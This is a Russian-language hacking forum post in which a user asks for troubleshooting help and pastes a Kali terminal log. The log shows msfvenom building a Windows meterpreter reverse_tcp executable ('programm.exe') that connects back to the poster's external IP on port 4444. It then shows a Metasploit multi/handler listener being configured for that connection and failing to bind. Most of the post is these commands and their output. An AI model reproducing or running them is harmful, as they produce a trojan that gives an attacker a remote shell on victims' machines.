
10.02.2018, 21:45
|
|
Познающий
Регистрация: 24.11.2016
Сообщений: 44
С нами:
4983446
Репутация:
0
|
|
Сообщение от Jerri
↑
pkill -9 ruby и после попробуй запускать.
Не дало решительным образом ничего.
.SpoilerTarget" type="button">Spoiler
Код:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
root@kali:~# ls
Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos
root@kali:~# pkill -9 ruby
root@kali:~# msfconsole
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler/
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 109.---.--.---
LHOST => 109.---.--.---
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Exploit running as background job 0.
[-] Handler failed to bind to 109.252.62.124:4444:- -[*] Started reverse TCP handler on 0.0.0.0:4444
msf exploit(handler) > exit
|
|
|